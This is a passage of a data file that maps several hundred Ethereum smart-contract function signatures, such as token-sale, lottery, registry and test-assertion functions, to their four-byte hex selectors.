"Offer(address,address,bytes32,uint256,uint256,uint128,uint256)": "0xeb62a013", "set(bytes32,address)": "0xba44593c", "SimpleNameService()": "0x3a311b84", "removeSshKey(string)": "0x46bbb6cf", "addSshKey(string)": "0x690252c8", "SshKey()": "0x4b3727fb", "Companion()": "0x2cead658", "StoppableMock()": "0x7aba2249", "setGroupRight(string,string,bool)": "0xbd991fc5", "getMemberListCount()": "0x723b2b58", "memberGroupNameHash(address)": "0x19b5176e", "memberHasRight(address,string)": "0x6c3ea721", "getGroupRight(string,string)": "0x533c023b", "getMemberAtAddress(address)": "0x79ec3864", "setRightOfGroup(string,string,bool)": "0x101b94f1", "changeSelfAddress(address)": "0x9fd1bd1f", "changeSelfName(string)": "0x045eea7d", "changeMemberGroup(uint256,string)": "0x16cbf987", "incMemberBadRep(address,uint256)": "0xe56044c8", "incMemberGoodRep(address,uint256)": "0x06ebe49f", "alterBannedStatus(address,bool)": "0x5bc72460", "removeMemberWithAddress(address)": "0x493caeea", "setSelfAsPureShareholder(string)": "0xd2a7ea17", "setSelfAsContributor(string)": "0x14567b8b", "addMember(string,address,string,uint256,uint256)": "0x9bd4d455", "MemberHandler(string,address)": "0x414c2aab", "BOECoin(uint256,string,uint8,string)": "0xc791cc39", "base()": "0x5001f3b5", "die()": "0x35f46994", "greet_omar(uint256)": "0xf4b96570", "getRecordByRow(uint256)": "0xd923c99e", "RecordManager()": "0x1212c12f", "updateRecord(string,string,string)": "0xf30562b6", "addRecord(string,string,string)": "0x3f723c62", "newRecord(string,string,string)": "0x96e8d14c", "getRecordCount()": "0xca267f28", "isRecord(string)": "0x5e6fc129", "ContractConstructor(string)": "0x3c11845e", "HelloWorld(string)": "0x86066750", "cancelBid(uint256,uint256,bool)": "0xcaa7fd06", "sellTicket(uint256)": "0xf192866a", "bidTicket(uint256)": "0xe87c1463", "transferTicket(uint256,address)": "0x679ebf1a", "changeTicketType(uint256,string,uint256)": "0xe5ea1201", "Blocktix(string,uint256,uint256)": "0x8b1c8792", "powerUp(uint256)": "0x9a6bd379", "sell(uint256,uint256)": "0xd79875eb", "transData(address,uint256,bytes)": "0x422810ea", "asyncSend(address,address,uint256)": "0x8bcff416", "powerDown(address,address,uint256)": "0x3df2b29d", "_checkDestination(address,address,uint256,bytes)": "0xad838107", "powerPool()": "0x1e93c209", "floor()": "0x40695363", "activeSupply()": "0xbabd7012", "receiveapproval(address,uint256,address)": "0xab40b65a", "setprices(uint256,uint256)": "0x1f59653c", "freezeaccount(address,bool)": "0xce91e4b3", "minttoken(address,uint256)": "0x0c5fd4b2", "transferfrom(address,address,uint256)": "0x63b0545f", "approveandcall(address,uint256)": "0x6beadfc7", "transferold(address,uint256)": "0x5efbb728", "debugSetNow(uint256)": "0x1325c502", "MMMTokenCoin()": "0x96d99568", "fracExp(uint256,uint256,uint256,uint256)": "0xd6db85af", "compoundInterest(uint256,uint256,uint256,uint256)": "0x9b56730d", "PeoplesToken()": "0x15843245", "GATC(uint256,string,string)": "0x417f204e", "Filler()": "0x6cb3c94e", "ProofOfWeakHandsClassic()": "0x4094ac75", "DU30()": "0x08c5780a", "RUB_Omnidollar()": "0xa4c3e789", "RTEToken()": "0xa97c8eb4", "sellMNC(uint256)": "0x2182ff7e", "buyMNC(string)": "0x5453095b", "MidnightCoin()": "0x940834be", "fraction(int256,int256,int256)": "0x88a74525", "_explorationTime(uint8,uint8,uint8)": "0xbc636707", "explore(uint256,uint256,uint256)": "0xbfd6ef3e", "setMissions(uint256,uint16)": "0xeb28d249", "setPercentageCut(uint256)": "0x733bf2f2", "setTickTime(uint256)": "0xeff35f75", "setOracleFee(uint256,uint256)": "0x72601e77", "setOwnerCut(uint256,uint256)": "0x191e39b3", "getExplorerList()": "0x281972af", "EthernautsExplore()": "0xeb09ad46", "Austriachain()": "0x6f370b20", "getEth()": "0xcb05b93e", "changeAmount(uint256)": "0x5c320516", "sendEth(address[])": "0x3b2fe781", "getDescendantsOfThing(uint256)": "0x07a7465f", "setGameCost(uint256)": "0x7f17b79d", "purchaseGame()": "0xde65da20", "addThing(uint256,uint256,uint256,uint256,bytes32)": "0xe534a34b", "Force()": "0xdea37fb0", "_delHolder(address)": "0x402bf0ab", "_addHolder(address)": "0x60bff45c", "ANHUI_ANNUITY_DAO_33()": "0x07d7f8ed", "getCommentAccountsLength()": "0xd2676711", "getCommentAccounts()": "0x5ba39782", "getComment(address,address)": "0xdd73d17b", "setComment(bytes3,string)": "0x4f73928a", "setNote(uint256,bytes32,bytes20,string)": "0x520aea97", "addNote(bytes32,bytes20,string)": "0x2bf885f0", "DECEX()": "0xa499bc4a", "FALCON(uint256,uint256)": "0x0334e725", "distributeCOMIKETCOIN(address[],uint256)": "0xe157819a", "COMIKETCOIN()": "0x580c0fd8", "Withdraw(address)": "0xf6761151", "freezeAccountForContract(address,bool)": "0x7cc0e670", "setManagementContractAddress(bool,address)": "0x7d37fcba", "freezeAccountForOwner(address,bool)": "0x5fc02dcd", "BezantToken(string)": "0xf8341fca", "BezantERC20Base(string)": "0xbf52439b", "exchangeTransfer(address,uint256)": "0xd9ddafb3", "SphereToken()": "0x21a804fc", "reservesPerUnitToken()": "0xfe5ba303", "feePerUnitOfCoin(uint256)": "0x3d0ab170", "_resetTransferredCoinFees(address,address,uint256)": "0x0ad9cf6f", "claimFeesForRound(address,uint256)": "0x4e4ac577", "claimFees(address)": "0x15a0ea6a", "depositFees(uint256)": "0xebdac090", "addReserves(uint256)": "0x7821a514", "reduceReserves(uint256)": "0x07e27959", "removeMintingFactory(address)": "0x3557c70a", "addMintingFactory(address)": "0xa1b1e507", "resetFactories()": "0x463079b5", "TNPC()": "0x5e97894a", "viewLatestErc20TransactionRequest()": "0x780ff8d1", "viewLatestEthTransactionRequest()": "0x633982c5", "rejectErx20TransactionRequest()": "0x69ba3c06", "rejectEthTransactionRequest()": "0xfa2cac28", "confirmErc20TransactionRequest()": "0x0bfd1271", "confirmEthTransactionRequest()": "0x7e574098", "requestErc20Transfer(address,address,uint256)": "0xb8d00d4a", "requestTransferOfETH(address,uint256)": "0x098bf5de", "unauthoriseAddress(address)": "0x61bc6c57", "authoriseAddress(address)": "0xa10f5610", "getContractUpdatedTimeById(bytes32)": "0x263fbd45", "getContractCreatedTimeById(bytes32)": "0xda2216ef", "getContractAddressById(bytes32)": "0xefdff7bb", "getContractNameById(bytes32)": "0xbbef83cf", "addAddress(string,address)": "0xceb35b0f", "getAvailableIds()": "0x5b80f497", "AddressProxy()": "0xacc05ccc", "CoalichainToken()": "0x0005a533", "Griefing(uint256)": "0x00aac98b", "BIPOOH_DAO_32()": "0xe4f6973f", "withdrawBasicTokens(address)": "0x9dd1687e", "icoStop()": "0xb531a872", "icoStart()": "0x827037db", "MastermindAlliancePublishingGroupToken()": "0xbbbeac89", "Candy(address,address)": "0x4a5dcb5b", "NineLTDevToken()": "0xdc596304", "TZCoin()": "0x77598626", "recordName()": "0xa6fd2487", "tryToRecord(address,uint256)": "0x355c6457", "recordNameCount()": "0x4725211b", "_recordName(address)": "0x40998845", "setNameValue(uint256)": "0x15f903a3", "setAgent(address)": "0xbcf685ed", "destroyTheUniverse()": "0x1d07b797", "getETH(uint256)": "0x2835b45c", "EducationToken()": "0x7d85445d", "hasBuyerLotteryBonusWon(address)": "0x0e7b9f10", "getBuyerFunded(address)": "0x08a12b9a", "releasable(address)": "0xa3f8eace", "releasableViewOrSend(address,bool)": "0x1341b33c", "stageFundGoalReached(uint8)": "0xe83ba1fe", "getBuyer(address)": "0x5721e419", "getStageWinners(uint8,uint16,uint8)": "0xbc44e79d", "getStageBuyers(uint8,uint16,uint8)": "0x5736c9d4", "getWinners(uint16,uint8)": "0x1484cd32", "getBuyers(uint16,uint8)": "0x63a6cc7d", "setStageOpeningTime(uint8,uint32)": "0xfe76fbe3", "getStageAverageBonus(uint8)": "0xd87c9478", "removeAddressesFromOperators(address[])": "0xc93e718b", "removeAddressFromOperators(address)": "0x011eb18c", "addAddressesToOperators(address[])": "0x1314e272", "addAddressToOperators(address)": "0x8ee4d44b", "myfast(address,uint256)": "0x133d2afe", "USDsToken()": "0xc932c71e", "SujiToken()": "0xfa984da8", "SZA(uint256,string,string,uint8)": "0xa3f2d2b5", "Blizzard(uint256,string,string)": "0x596d6f08", "OCTACrypto()": "0x5536e2d6", "LUMA()": "0x8a1678a4", "freeTokens(address,uint256)": "0xfbcece85", "_setPriceFactor(uint256,uint256)": "0xd44cf3dc", "_setRate()": "0x5929b837", "_calculateMinimumprice()": "0xf8984677", "_pro(address,uint256)": "0xe5e792de", "OutCloud(address,address)": "0x4bf79cd9", "MONEYTREETOKEN()": "0x12e57fdc", "Purox(uint256,string,uint8,string)": "0x02ed4d2d", "CoinDisplayNetwork()": "0x578436a7", "Cloudbric(address)": "0x5dfc273c", "ptxToken()": "0xfa73cb37", "getLock(address,uint256)": "0x1208a256", "getLockSize(address)": "0x3248687a", "getUserAddr(uint256)": "0x254bd326", "_checkUnlock(address)": "0xdf0441cc", "_addUser(address)": "0x57ca94fa", "LingYanToken()": "0x5aea92f5", "batchClaim(uint256,uint256)": "0x50416b93", "_sendOwnership(address,address,uint256)": "0x82430c07", "sendOwnershipFrom(address,address,uint256)": "0xde995b90", "sendOwnershipAndCall(address,uint256,bytes)": "0xb4abda8b", "addContribution(address,uint256)": "0x39ecacac", "onOwnershipTransfer(address,uint256,bytes)": "0x5b4cc320", "ULCToken(address,uint256)": "0x416cf34e", "setJackpot(address)": "0x7e95385c", "MyShareToken()": "0xfc32f09c", "TokenSBT()": "0x22174ebf", "CMBUpgradeableToken(address)": "0x0a513bc7", "changeMinInvest(uint256)": "0x5bd7ebc5", "Token99chain(uint256,string,uint8,string)": "0x26961b8c", "ZoueToken()": "0x75846a5e", "getPlayerAff(address)": "0xd18ad4de", "updateGenVault(address,uint256)": "0x9d9d432f", "withdrawEarnings(address)": "0x3d4d8d4f", "RoundEnd()": "0x475e0062", "managePlayer(address)": "0x0f47165e", "calcUnMaskedEarnings(address,uint256)": "0x1f1e2cfa", "BuyCore(address,uint256,uint256)": "0x9759c160", "BuyTicketUseVault(address,uint256)": "0xb9aceb63", "BuyTicket(address)": "0x4b836181", "isValidName(string)": "0x1e30397f", "getAddressFromSig(bytes32,uint8,bytes32,bytes32)": "0x153fe583", "getAddressFromData(bytes)": "0xf5cb3dff", "SmartBitcoin()": "0x3999bbce", "LifeSet_005()": "0x2259d221", "setErc20token(address)": "0xee453126", "onExecuteMessage(address,uint256)": "0x7d24cd18", "relayedMessages(bytes32)": "0x21d800ec", "setRelayedMessages(bytes32,bool)": "0x564ca533", "executeSignatures(uint8[],bytes32[],bytes32[],bytes)": "0x232a2c1d", "requiredMessageLength()": "0x408fef2e", "getUserMoney(address)": "0x0e887cda", "trigger_game_end(uint256)": "0x7212eadd", "buildRight(address,uint256)": "0xc80944e5", "buildLeft(address,uint256)": "0x848c0a39", "getBlockBuildFee(uint256)": "0xe0cd34f6", "BlockWar()": "0xb9f2086b", "setSalary(uint256,uint256)": "0x74a37efc", "setBoardMember(uint256,uint256)": "0x808134c8", "createXMLYTrade(bool,uint256,uint256)": "0x5ad5ca74", "badgeIfFreeze(address)": "0x82f4b3a8", "_badgeUnFreeze(uint256)": "0x25bb8e93", "_badgeFreeze(uint256)": "0x50e17975", "badgeFreeze(address,uint256,uint256)": "0x27acfff9", "burnBadge(uint256)": "0x55de28ae", "mintBadge(uint256)": "0xc3c63edc", "badgeTransfer(address,uint256)": "0x2bac276b", "badgeBalanceOf(address)": "0xc681d68d", "XMLYBadge()": "0xccabcfca", "BeBitcoin(uint256,string,uint8,string)": "0xd1a4a98c", "addSuperPlayer(address,bytes32)": "0x02431422", "registerNameXnameFromDapp(address,bytes32,bool)": "0xd87a253b", "registerNameXaddrFromDapp(address,bytes32,bool)": "0x285137c9", "registerNameXIDFromDapp(address,bytes32,bool)": "0x8886a667", "receivePlayerInfo(uint256,address,bytes32)": "0x1fda5b45", "make_anonymous_registration(uint256,uint256)": "0xe1252b9b", "make_initial_deposit(uint256)": "0xf99f128c", "create_new_deal(uint32,uint256,uint32)": "0xf7ec7b51", "get_deal_status(uint256)": "0x8ddcf81e", "get_deal_state(uint256)": "0x5e9a8c42", "number_of_deals()": "0x5e6c5d77", "mixer()": "0xf6bed059", "FlightPlan(address)": "0x73ab7503", "calculateAndRegisterEarlyBonuses(uint256)": "0xeced2967", "calculateQuantityBonuses(uint256)": "0xed89b2a0", "calculateTimeBonuses(uint256)": "0xa84950df", "calculateAndRegisterBonuses(uint256)": "0xf796e06f", "giveTokens(address[],uint256)": "0xb1b96fdf", "giveTokensOne(address,uint256)": "0x6510076f", "authorize(address[])": "0x84e45689", "authorizeOne(address)": "0x0b107904", "setMainWallet(address)": "0xd0a5eb4e", "setAdminAccounts(address[3])": "0x39255494", "AthenaLabsICO(uint256,uint256[7],uint256,address,address[3])": "0xf68da9a0", "Internet(string,string)": "0xb60761c4", "sendeth(address,uint256)": "0xa3210e87", "RaffleDappBook(string,uint256)": "0x5ae46e93", "resetMistCallLoad()": "0x461751e6", "JustifyClaimWithWitness(uint8)": "0xdc9513c1", "JustifyClaim(address)": "0x14106b49", "deactivateClaim()": "0xd9a0b299", "createClaim(address,uint256)": "0xe85b26c0", "DecreaseWithdrawalAmount(uint256)": "0x0c5589b8", "IncreaseWithdrawalAmount(uint256)": "0xdfd142c1", "DecreaseTheAllowance(address,uint256)": "0x56423986", "TransferTo(address,uint256)": "0x84585099", "Multisig(address,address,address,address)": "0x8d008989", "Fairsale(uint256,uint256)": "0x49cc2eb1", "getHashID(address,bytes32)": "0xd556c8f5", "verifyIdentity(address,bytes32,uint256)": "0x467eb43f", "setCode(address,bytes32,uint256)": "0xcc44b15b", "verifyCode(bytes32,uint256)": "0xa85d11b3", "claimIFactor(bytes32,uint256)": "0x9857650c", "getRow(uint256)": "0x303a36e2", "getPixel(uint256,uint256)": "0x8a1dd162", "setPixelBlock(uint256[],uint256[],uint256[],uint256[])": "0xcd5655da", "Lesson_2(address,uint256)": "0xe8c96256", "_setPermissions(address,address[])": "0xfd9bf0a4", "_setRolePermissions(address,address)": "0x569ca935", "hasPermission(address,address)": "0xcde68041", "_cancelPermissions(address,address[])": "0xd7682701", "_cancelRolePermissions(address,address)": "0x746eff8c", "_cancelRole(address,address)": "0xbe9413a7", "queryRoles(address)": "0xef8322fd", "clearRole(address)": "0xc631e758", "cancelRole(address,address)": "0xa8319481", "setRole(address,address)": "0xa32710eb", "deletePermissions(address,address[])": "0x17b2e350", "addPermissions(address,address[])": "0x0773e6ba", "updateRoleName(address,bytes32)": "0xd9c090a0", "deleteRole(address)": "0x54b025c5", "newRole(bytes32,address[])": "0x551ef860", "isUpgraded()": "0x42c80fc9", "updateRegistry(bytes32,address)": "0x1f299c1a", "BulletinBoard(address)": "0xb43dbffc", "setFreezeTx()": "0x95c7b007", "setLiveTx()": "0x97100be9", "setFinishedTx()": "0xe58b5ab2", "viewSettingsChange(uint256)": "0x4ab320b4", "getSettingsChangeConfirmationCount(uint256)": "0x451bedb3", "isConfirmedSettingsRequest(uint256)": "0x2789192f", "confirmSettingsChange(uint256)": "0xb8dd3c55", "tgeSettingsChangeRequest(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x74651594", "exec(bytes,bytes,address[])": "0xc409ad08", "gogo(bytes,bytes,address[])": "0xd0fca0ca", "encodeIfElse(uint256,uint256,uint256)": "0x23e8cefc", "encodeOperator(uint256,uint256)": "0xa2c4895a", "DragonStone()": "0x7aa3976f", "_setAppIfNew(bytes32,bytes32,address)": "0x242be01a", "_setApp(bytes32,bytes32,address)": "0xb899e1b7", "newPinnedAppInstance(bytes32,address)": "0x958fde82", "newAppInstance(bytes32,address)": "0x80cd5ac3", "TokenAiNetworkToken(address,address)": "0xd964f28a", "test_BondPostedButNoMajority()": "0x44017cd6", "test_BondPostedAndOverMajority()": "0x4918d588", "test_ShouldPassButNoBondSoFail()": "0xb58696ba", "TestContract(address,uint256)": "0xe0e16f91", "changeSupply()": "0xa6ce69a2", "GxEvents(address)": "0x2cc53743", "mbtcToUsd(uint256)": "0xeb854131", "setMyOracle2(address)": "0x716adc36", "oracleCurrentInt()": "0x649371e0", "setstoredaddress(address,address)": "0xe486869b", "callstoredaddress(address)": "0x37321bd7", "calluseraddress(address,address)": "0x7caae38c", "thisisfine()": "0x5a6814ec", "Caller(address)": "0x20f727e2", "theFunction()": "0xb6868a69", "updateAffiliate(address,uint8)": "0x1b98cd68", "PreICOProxyBuyer(address,uint256,uint256,uint256)": "0xf434e028", "DDJATCoin()": "0xaef88aba", "GxCallableByDeploymentAdmin(address)": "0x3a2b9c37", "withdrawProvider()": "0xd02721cb", "depositProvider()": "0x376b9c25", "withdrawClient()": "0x7a99b018", "closeRefunds()": "0x79318d81", "spreadTokens()": "0x55909da3", "AgroTechFarmToken()": "0xa6f257cc", "setSaleAgent(address,bool)": "0xa09ddd4f", "isRequestPending(address)": "0x1951f9ba", "getNumber(address)": "0x942ea466", "_revealBlock(address)": "0x990e178a", "_remainingBlocks(address)": "0x4873c721", "_canReveal(address,address)": "0x8c7dd9ec", "canReveal(address)": "0x936315d6", "_revealNumber(address)": "0x5c4633a4", "removeProxy(address)": "0xbe116c3b", "enableProxy(address)": "0xa9671dd9", "setWaitTime(uint8)": "0x49af63a9", "setMax(uint256)": "0x1fe9eabc", "RandomLedgerService()": "0xbf9c0d44", "revealNumber(address)": "0x171fcb5a", "requestNumber(address,uint256,uint8)": "0x142769aa", "expiredBlock()": "0x000be356", "generateRandomNumber(uint256,uint256)": "0x609526c2", "EarlyTokenSale(uint256,uint256,address,address)": "0x53bd353b", "DataBrokerDaoToken(address)": "0x521af962", "CRYPTAU()": "0x420d4bdd", "endRace()": "0x1ea0d0de", "race()": "0x691ba73a", "RACEFORETH()": "0xe318a74c", "addrecruit(address,address,address,address)": "0xbb4534f1", "removeFunder(address,address)": "0xbc87103a", "addFunder(address,address,uint256,uint256)": "0x5900a09c", "removeSubOwner(address,address)": "0xee44b7d1", "addSubOwner(address,address)": "0xa78b3d96", "findElevenPmUtc(uint256)": "0x3d330c49", "tokenCalculate(uint256)": "0xe77a6daa", "removeFromWhiteList(address[])": "0xb11560c5", "addToWhiteList(address[])": "0x740d73f3", "setIcoPhase(uint256,uint256)": "0x66f3882f", "getIcoBonus()": "0xa2c41366", "getPreIcoBonus(uint256)": "0x92b6ebfa", "DatareumCrowdsale(address)": "0x56025c9e", "moneyBack(address)": "0xe0db874d", "ECHARGE()": "0x1db0ffe9", "sendp(address,uint256)": "0x9d478656", "GlobalCoin()": "0x810e9720", "yourShares(address)": "0x40f3b6f1", "expectedDividends(address)": "0x5fad663e", "insert(address,uint256)": "0x0fd0ae10", "setClosingTime(uint256)": "0x4b89c41d", "setBonusRate(uint256)": "0xe4fcf329", "BitMix()": "0xf1f87fc9", "mintDSBCToken(address,uint256)": "0x88bb18fc", "totalDistributed()": "0xefca2eed", "CandyDropOpen(bool)": "0x2f377902", "DASABI_IO_Contract()": "0x1fa9d21f", "_getCurrentPeriod()": "0xefe213a9", "getTokenAmount(address,uint256)": "0x115ece4c", "getCurrentRate(address)": "0xdce77d84", "isAddressInWhitelist(address,address)": "0xd75de4ab", "removeAddressFromWhitelist(address,address)": "0xaa5ebd7f", "addAddressesToWhitelist(address[],uint256)": "0x70be89c1", "addAddressToWhitelist(address,address,uint256)": "0x29e2b478", "clearPeriods()": "0xd9bd0799", "addPeriod(uint256,uint256,uint256)": "0x3be64ed7", "multisend(address,address[],uint256)": "0xccdd1979", "contractTokenBalance(address)": "0x66e3e5e4", "Bitwincoins(uint256,string,string)": "0x175b859d", "EtherdeCoin()": "0x7f0f09af", "transferToKnownContract(address,uint256,bytes32[])": "0xe1bf34e9", "removeAllowedContract(address,address)": "0xd67d73e0", "addAllowedContract(address,address)": "0xc764427c", "ArtexToken()": "0x31a079ca", "migrateInvestorFromHost(address,address)": "0xe0812c75", "setMigrationHost(address,address)": "0x194f8806", "MigratableToken()": "0x69f8408a", "returnInvestmentsToInternal(address)": "0x7fc53fb5", "returnInvestmentsTo(address)": "0x2d7b8c98", "returnInvestments(uint256)": "0x8032751b", "setEtherPriceUSDWEI(uint256)": "0x0ee21ddc", "completeSale(uint256)": "0x750225d0", "failSale(uint256)": "0x0afd21d2", "startSale(address,uint256,uint256,uint256,uint256)": "0x04d6db05", "startPreSale(address,uint256,uint256,uint256)": "0x4a0af245", "getTokenPriceUSDWEI()": "0x7b5f7267", "emitTokensFor(address,uint256,uint256,uint256)": "0xfaf236c7", "depositBTC(address,uint256,uint256,bytes32)": "0x47b4e272", "burnTokens(address,address,uint256)": "0x423c3a48", "emitAdditionalTokens()": "0x4ce6a521", "emitTokens(address,uint256,uint256)": "0x2da40ac7", "transfered(address,uint256,bytes32[])": "0x12cd2101", "changeBtcOracle(address)": "0x173ea238", "DatumGenesisToken()": "0x670e2e7f", "FantasySportsCoin()": "0x0bd62ad5", "CXCoin()": "0xfc10881a", "distributePresale(address[],uint256[])": "0xadad4873", "releaseTokensTo(address,address)": "0xe68a9610", "BdpController(bytes8)": "0x18158e6b", "setNextImagePart(uint256,uint16,uint16,uint16,uint256[])": "0xd64c2018", "checkImageInput(uint256,uint256,uint256[],bool,bool)": "0xeeb7ab0c", "updateRegionPixelPrice(uint256,uint256)": "0x8b4ce7ce", "updateRegion(uint256,uint256,uint256[],bool,bool,uint8[128],bool,address)": "0xce8e95d4", "setupRegion(uint256,uint256,uint256[],bool,uint8[128])": "0xf8b096bb", "addLOC(address)": "0xcbb70c92", "_subjectToFees(address,uint256)": "0xaaa7744b", "_transferFee(address,uint256,address)": "0x4f25ec6e", "LaborHourToken(address,int256,string,uint256)": "0x921b15ae", "isLOC(address)": "0xc7e50dc9", "requestStempas(bytes32,address)": "0x8daf08d9", "setCallerFee(uint256)": "0x53aa7dcd", "setMakerFee(uint256)": "0xb8bd3dbb", "executeBet(address,address,uint256)": "0x124c2dde", "Ethbet(address,address,address,uint256,uint256)": "0x0b731652", "getHash(address,uint256)": "0xed05582b", "intervalAt(uint256,uint256,int256,uint256)": "0x7b42f6f7", "intervalsAt(uint256,uint256,int256)": "0x608980eb", "numIntervals(uint256)": "0x85522831", "addInterval(uint256,uint256,uint256,bytes32)": "0x4ce18ec3", "ExampleIntervalTree()": "0x57955f3b", "SellOrder(uint256,uint256,address)": "0x02989d9f", "setWinner()": "0xed05084e", "timeoutYEnabled()": "0x1659aecc", "timeoutXEnabled()": "0xf02a306e", "timeoutY()": "0xcadb3031", "timeoutX()": "0xdf037443", "revealY(uint256,uint256)": "0x61cd90b0", "revealX(uint256,uint256)": "0xdcf97439", "Match(address,address,bytes32,bytes32,uint256,uint256)": "0x71d30a17", "getNumberOfParticipantsPerLevel()": "0x48aac336", "allRefunded()": "0x102c920a", "lotteryWinner()": "0x3e351a45", "getSecretAtLevel(uint256)": "0x332c26d6", "goForward()": "0xdf591e82", "getMatchData()": "0x6b4ca2a8", "getMatchIdx()": "0xec7ff617", "getMatch()": "0x3d8a03af", "timeoutRegistration()": "0xd879380d", "register(bytes32[])": "0xb564561e", "Lottery(uint8,uint256)": "0xc1e9c53e", "Contract(bytes32)": "0x52772264", "getName(uint256)": "0x6b8ff574", "createContract(bytes32)": "0x3f811b80", "Ambassador()": "0x250bc504", "addressOf(address,string)": "0x55589cdd", "register(string,address,address)": "0x7915c069", "localsService()": "0xa140a687", "pow2Constant()": "0x76f88781", "pow2()": "0x37f7c4d4", "fooInt()": "0xac6a4d6a", "withdrawEtherInternal(address,address,uint256)": "0x54573835", "rejectConsent()": "0x7c8dc575", "giveConsent()": "0x4bf80d39", "requestConsent()": "0x9ec79e99", "SimpleConsent(string,address,address)": "0xbf5abfe3", "boolToBytes32(bool,bool)": "0xfb15e737", "assertEq(bytes,bytes,string)": "0xe24fed00", "assertEq(bytes,bytes)": "0x97624631", "assertEq(string,string,string)": "0x36f656d8", "assertEq(string,string)": "0xf320d963", "assertEq(bool,bool,string)": "0x4db19e7e", "assertEq(address,address,string)": "0x2f2769d1", "assertEq(uint256,uint256,string)": "0x88b44c85", "assertEq(int256,int256,string)": "0x714a2f13", "assertEq(bytes32,bytes32,string)": "0xc1fa1ed0", "assertEq(bytes32,bytes32)": "0x7c84c69b", "assertFalse(bool,string)": "0x7ba04809", "assertTrue(bool,string)": "0xa34edc03", "test_0_ensureServiceRegistryFunctions()": "0x6a4f5495", "newService()": "0x5e3e6092", "SNT(address)": "0x3b0d2764", "listResources()": "0xf98e09a6", "request(bytes32,string,string)": "0x3117d6bb", "WeQuest()": "0x4a0bb6a4", "addPayee(address,uint256)": "0x18f9b023", "SplitPayment(address[],uint256[])": "0x78451d64", "setContractOwner(address)": "0xa34d42b8", "recoverUser(address)": "0x35f2507f", "callBackForRequestRandom(bytes32)": "0xafa437c0", "proxyTransferFromWithReference(address,address,uint256,bytes32,string,address)": "0x161ff662", "_allowance(uint256,uint256,bytes32)": "0x0d3a557e", "proxyApprove(address,uint256,bytes32,address)": "0x14712e2f", "_approve(uint256,uint256,bytes32,uint256)": "0x104f2d8f", "distrust(address)": "0xf0c06aa5", "isTrusted(address,address)": "0x6713e230", "changeOwnership(bytes32,address)": "0xfd83915e", "revokeAsset(bytes32,uint256)": "0xca448a88", "reissueAsset(bytes32,uint256)": "0xe0873c06", "issueAsset(bytes32,uint256,string,string,uint8,bool)": "0x085a4705", "_createHolderId(address)": "0x8221ac6f", "getHolderId(address)": "0x0af3e660", "_proxyTransferEvent(uint256,uint256,uint256,bytes32)": "0xd2e2acf5", "proxyTransferWithReference(address,uint256,bytes32,string,address)": "0x57a96dd0", "_transfer(uint256,uint256,uint256,bytes32,string,uint256)": "0x2602bc8f", "_transferDirect(uint256,uint256,uint256,bytes32)": "0xff3e8ba1", "massTransfer(address[],uint256[],bytes32)": "0xcdeb1485", "setProxy(address,address,bytes32)": "0xe8489626", "_address(address,uint256)": "0x80d7f92a", "_balanceOf(uint256,bytes32)": "0x5b7da338", "isOwner(address,bytes32)": "0xe96b462a", "isReissuable(bytes32)": "0xc4eeeeb9", "description(bytes32)": "0xbebcc045", "baseUnit(bytes32)": "0xdc86e6f0", "shouldBeTrusted(address,address)": "0x4507a545", "currentExpiryInterval()": "0xb95cbed6", "taxTillNow()": "0x56544af0", "addressFounders1()": "0x56cea4b2", "adventurePresale()": "0x445264db", "codexCoin()": "0x8ed3fa7c", "ticketCounter()": "0x8c4d59d0", "bundlingDenied()": "0xa8074b55", "withdrawalDelay()": "0xa7ab6961", "partnersKey()": "0x863524b1", "teamOneShares()": "0xd489b83f", "GENESIS()": "0xb7dec1b7", "OWNER_TOKENS()": "0x5fcd7fe6", "periodICOStage1()": "0x9bf74ae0", "lastBlock_f11Hash_uint256()": "0x3912657a", "BLOCKS_PER_PHASE()": "0x2e5ab94f", "unlockStepLong()": "0x24b89fa7", "lastInvestorsProfit()": "0x701e1dfc", "foreverBlockBattleAddressUpdate()": "0xbf5a451b", "globalTokenTransferLock()": "0x54a598b0", "voteA()": "0x55416e06", "TOTAL_DINOTOKEN_SUPPLY()": "0x91cdecab", "SendPreReserved5()": "0x05d74066", "SALES_START()": "0xfcfa2bfe", "acceptPAIReceiptOwnership()": "0x7ec1c1aa", "m_tokenDiscountThreshold()": "0x566b28f0", "best()": "0xd0940a5d", "bountyFactory()": "0xb8f75c0b", "restTokensBurned()": "0xb86780b3", "Max_Mintable()": "0x9f549015", "proofToken()": "0x0e94a0ee", "priceUpdateWaitingTime()": "0x71b7d5c4", "tickerRegistry()": "0x2a858126", "sumICOStage7USD()": "0xd98f4ea2", "giveAllToCharity()": "0x9d8c3994", "START_ETH_TO_CENTS()": "0x4d794cfc", "_erc20token()": "0x4b8e31a2", "stageTwoEnd()": "0x9df184ae", "size2()": "0xd1120db0", "totalEtherRaised()": "0x691a5842", "engineer()": "0x603a552e", "confirmParties()": "0x6b5c8fba", "fundsTransfered()": "0x521d80f8", "niceguy2()": "0xfdf372ad", "CYFM()": "0xb1527bd9", "preSaleWeiCap()": "0xccfc1e4e", "MIN_ACCEPTED_AMOUNT_FINNEY()": "0x8843c222", "rankDataContract()": "0xb946c19c", "redemptionPercentageOfDistribution()": "0x75e6f675", "firstCapEndingBlock()": "0xe2c1f7d7", "expertsAccount()": "0x96d66cf8", "rewardPercentageDivisor()": "0xe025a666", "original()": "0x46c715fa", "last_number()": "0x64679806", "TIER4_RATE()": "0x4af4c191", "generatedEve()": "0xab9a913a", "isVotingPhaseOver()": "0xb5ee6f3d", "deathData_f11()": "0x586ccfa7", "tier1Count()": "0xa3a7647c", "tokensReleasedPerPeriod()": "0x1e924bf8", "mintMaster()": "0xd991c58f", "lastDrawTs()": "0x48917d5d", "feeMultiplier()": "0xe5a70ef7", "min_share_price()": "0x413abc3d", "ownersLen()": "0x237f142a", "PURCHASE_AMOUNT_RATE_REFERENCE()": "0xdd1f969b", "transferRestTokensToOwner()": "0x96289427", "ethDeltaDepositAddress()": "0xf516e9ec", "currentnumber()": "0xbd826f2b", "collectedFeesInTwei()": "0x40277604", "Resilience()": "0xec277ce7", "UFOcoin()": "0xa9f987b5", "communityContributionSupply()": "0x612249fb", "softCapTokens()": "0x897cb036", "mvnpereth()": "0x90b2ce6f", "CurrentTime()": "0xd80e8700", "littafiAccount()": "0x28469c36", "AutorizeRefund()": "0xbe104849", "paymentContractAddress()": "0x39b651c6", "maxBidPercent()": "0x1c983347", "target_hit()": "0x171dfb4f", "totalEthRaised()": "0xc9e904be", "teamWithdrawSupply()": "0x289aac50", "sixMatchPayoutInPercent()": "0xaa743c85", "RTI()": "0x58e1c174", "PRE_ICO_TIER_LAST()": "0xeab228b9", "minUSD()": "0xdc992aa0", 